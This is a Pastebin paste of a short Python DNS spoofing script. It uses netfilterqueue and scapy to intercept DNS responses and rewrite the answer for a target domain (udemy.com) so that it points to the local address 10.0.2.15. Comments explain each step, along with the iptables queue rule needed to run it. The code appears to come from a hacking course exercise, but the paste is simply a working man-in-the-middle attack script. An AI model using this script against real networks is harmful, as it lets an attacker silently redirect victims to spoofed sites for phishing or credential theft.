Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- import subprocess
- def process_packet(packet):
- #RR - Resoucre Record(Response) QR-Question Record(Request)
- #method get_payload() gives all information that packets contain
- #we have to convert get_payload() method to a scapy
- #so we can use all stuff that scapy allows us. See layers,modify it fields etc..
- #qname means DNS of site (eg: bing.com)
- scapy_packet = scapy.IP(packet.get_payload())
- #if packet contains a dns response
- if scapy_packet.haslayer(scapy.DNSRR):
- #if that dns response is response to a website that we want to target
- qname = scapy_packet[scapy.DNSQR].qname
- if 'udemy.com' in qname.decode():
- print('[+] Spoofing target..')
- #creating our own ANSWER and fill it
- #rrname - response name(dns that target want to access) We have already captured that in qname
- #whenewr target wants to acces zsecurity.org we will spoof it rdata
- #rdata - IP returned as a requested dns
- answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.15')
- #We want to access DNS answer field. As usually in scapy we access it that way:
- #That command spoof original packet to our custom
- scapy_packet[scapy.DNS].an = answer
- #we have to change ancound field
- #ancount - how many responses was sent. In our case we send only 1 response and change this field for 1
- scapy_packet[scapy.DNS].ancount = 1
- #IP and UDP layers contain fields that check if packet was changed.
- #This fields is len and chksum. All we have to do is just delete this fields and scapy will do all work for as
- del scapy_packet[scapy.IP].len
- del scapy_packet[scapy.IP].chksum
- del scapy_packet[scapy.UDP].len
- del scapy_packet[scapy.UDP].chksum
- #Last step is accept modifying packet, so now we actually have to give our modify packet to packet.accept() to send it
- packet.set_payload(bytes(scapy_packet))
- packet.accept()
- #subprocess.call('iptables -I FORWARD -j NFQUEUE --queue-num 0', shell=True)
- #instance of netfilterqueue object
- queue = netfilterqueue.NetfilterQueue()
- #bind, so we can have access to iptables queue
- #process_packet is func that will be executed on each packet
- #that will be trap in queue
- #0 is because we named like that our queue in iptables
- #iptables -I FORWARD -j NFQUEUE --queue-num 0
- queue.bind(0, process_packet)
- queue.run()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement